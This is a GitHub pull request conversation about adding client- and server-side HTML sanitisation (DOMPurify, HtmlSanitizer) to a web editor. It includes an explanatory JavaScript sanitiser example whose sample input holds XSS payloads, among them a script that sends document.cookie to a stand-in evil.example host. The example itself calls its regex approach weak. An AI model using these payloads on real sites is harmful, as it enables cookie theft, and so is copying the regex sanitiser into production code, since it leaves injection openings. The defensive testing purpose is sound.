
Conversation


@manishagarwalnhs manishagarwalnhs commented Aug 25, 2022

…tor throughout solution

JIRA link

DLSV2-637

Description

The HTML editor is sanitised so that only clean HTML is sent to the server. At the server, the HTML string is sanitised again to make sure no risky HTML is eventually saved in the database. This is done using the DOMPurify library on the client side and the HTMLSanitizer package on the server side. The server side currently only removes iframe and img HTML tags, but this can be changed to remove more HTML tags if we want to.

Screenshots

No Screenshots available


Developer checks

I have:

  • Run the formatter and made sure there are no IDE errors.
  • Written tests for the changes (accessibility tests, unit tests for controller, data services, services, view models, etc)
  • Manually tested my work with and without JavaScript. Full manual testing guidelines can be found here: https://softwiretech.atlassian.net/wiki/spaces/HEE/pages/6703648740/Testing
  • Updated/added documentation in Swiki and/or Readme. Links (if any) are below:
  • Updated my Jira ticket with information about other parts of the system that were touched as part of the MR and have to be sanity tested to ensure nothing’s broken.
  • Scanned over my own MR to ensure everything is as expected.
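The two-layer flow described in the PR description (sanitise in the editor, then sanitise again on the server before saving) in working code, as an added example that is not the project's code and does not use DOMPurify or HtmlSanitizer. Those libraries parse with a real HTML parser and should stay in place; the small allowlist tokenizer below only makes the policy concrete: `script`, `style` and `iframe` are dropped with their bodies, `on*` attributes and `javascript:` URLs are removed, and a hypothetical `SERVER_POLICY` additionally strips `img` as the description says the server does. `CLIENT_POLICY`, `SERVER_POLICY`, `storeFromEditor` and the sample input are all constructed for this example.

```javascript
// Added example, not the project's code: a minimal allowlist sanitiser that
// mirrors the two-layer policy in the PR description. Production code should
// keep using parser-based libraries (DOMPurify client-side, HtmlSanitizer
// server-side) as the PR does; this regex tokenizer exists only to show the
// policy on concrete input.

// Elements whose body is discarded together with the tag: their text is code, not content.
const DROP_WITH_BODY = new Set(['script', 'style', 'iframe', 'object', 'embed', 'noscript']);

// Hypothetical policies chosen for this example. The client keeps <img> so the
// editor can show pictures; the server additionally removes img and iframe,
// which is the behaviour the PR describes for the server side.
const CLIENT_POLICY = {
  tags: new Set(['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li',
                 'a', 'h1', 'h2', 'h3', 'img']),
  attrs: { a: new Set(['href', 'title']), img: new Set(['src', 'alt']) },
};
const SERVER_POLICY = {
  tags: new Set([...CLIENT_POLICY.tags].filter((t) => t !== 'img')),
  attrs: { a: CLIENT_POLICY.attrs.a },
};

// href/src values must start with one of these; javascript:, data: and
// entity-obfuscated schemes fail the prefix test and the attribute is dropped.
const SAFE_URL = /^(?:https?:|mailto:|\/|#)/i;

const escapeText = (s) => s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
const escapeAttr = (s) => s.replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');

function cleanAttributes(tag, rawAttrs, policy) {
  const allowed = policy.attrs[tag] || new Set();
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  const kept = [];
  let a;
  while ((a = attrRe.exec(rawAttrs)) !== null) {
    const name = a[1].toLowerCase();
    const value = a[2] ?? a[3] ?? a[4] ?? '';
    if (name.startsWith('on') || !allowed.has(name)) continue; // event handlers never pass
    if (name === 'href' || name === 'src') {
      // Browsers ignore whitespace/control characters inside a scheme, so strip them first.
      const url = value.replace(/[\s\u0000-\u001f]/g, '');
      if (!SAFE_URL.test(url)) continue;
      kept.push(` ${name}="${escapeAttr(url)}"`);
    } else {
      kept.push(` ${name}="${escapeAttr(value)}"`);
    }
  }
  return kept.join('');
}

function sanitiseHtml(html, policy) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*)>/g;
  const out = [];
  let last = 0;
  let skipUntil = null; // name of the dropped element whose body is being discarded
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const isClose = m[1] === '/';
    const name = m[2].toLowerCase();
    if (skipUntil !== null) {
      if (isClose && name === skipUntil) skipUntil = null;
      last = tagRe.lastIndex;
      continue;
    }
    out.push(escapeText(html.slice(last, m.index))); // text between tags, stray < > escaped
    last = tagRe.lastIndex;
    if (DROP_WITH_BODY.has(name)) {
      if (!isClose && !m[3].trimEnd().endsWith('/')) skipUntil = name;
      continue;
    }
    if (!policy.tags.has(name)) continue; // forbidden tag removed, its text content kept
    out.push(isClose ? `</${name}>` : `<${name}${cleanAttributes(name, m[3], policy)}>`);
  }
  if (skipUntil === null) out.push(escapeText(html.slice(last)));
  return out.join('');
}

// The PR's flow: the editor sanitises before sending and the server sanitises
// again before saving. A client that skipped step one (or an attacker posting
// straight to the endpoint) therefore still cannot get risky markup stored.
function storeFromEditor(rawHtml, clientSanitised = true) {
  const sent = clientSanitised ? sanitiseHtml(rawHtml, CLIENT_POLICY) : rawHtml;
  return sanitiseHtml(sent, SERVER_POLICY); // what reaches the database
}

// Constructed sample input mixing legitimate markup with common XSS payloads.
const SAMPLE =
  '<p>Hello <b onclick="steal()">world</b></p>' +
  '<script>fetch("//evil.example/?c=" + document.cookie)</script>' +
  '<img src="/uploads/pic.png" onerror="alert(1)">' +
  '<a href="java\tscript:alert(1)">bad</a><a href="https://example.org">ok</a>' +
  '<iframe src="https://evil.example"></iframe>';

console.log('client :', sanitiseHtml(SAMPLE, CLIENT_POLICY));
console.log('server :', storeFromEditor(SAMPLE));
console.log('direct :', storeFromEditor(SAMPLE, false));
```

Running it shows the client pass keeping `<img src="/uploads/pic.png">` while dropping the `onerror`, `onclick`, `<script>` and `<iframe>`, and the server pass removing the `<img>` as well; the direct path (`clientSanitised = false`) yields the same stored string, which is the property the second layer exists for. The known weakness of regex tokenizers (a `<` inside a dropped `<script>` body can confuse the skip logic and truncate the rest of the document) is why the real implementation should stay with a parser-based library.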


@kevwhitt-hee kevwhitt-hee left a comment


Added the yarn.lock file, updated the version of dom-purify and fixed TypeScript lint errors. Tested with JS and non-JS, and <script> tags get reliably stripped before storing HTML to the database. Great work.

@kevwhitt-hee kevwhitt-hee merged commit eccf652 into master Aug 26, 2022
@kevwhitt-hee kevwhitt-hee deleted the DLSV2-614 branch August 26, 2022 15:10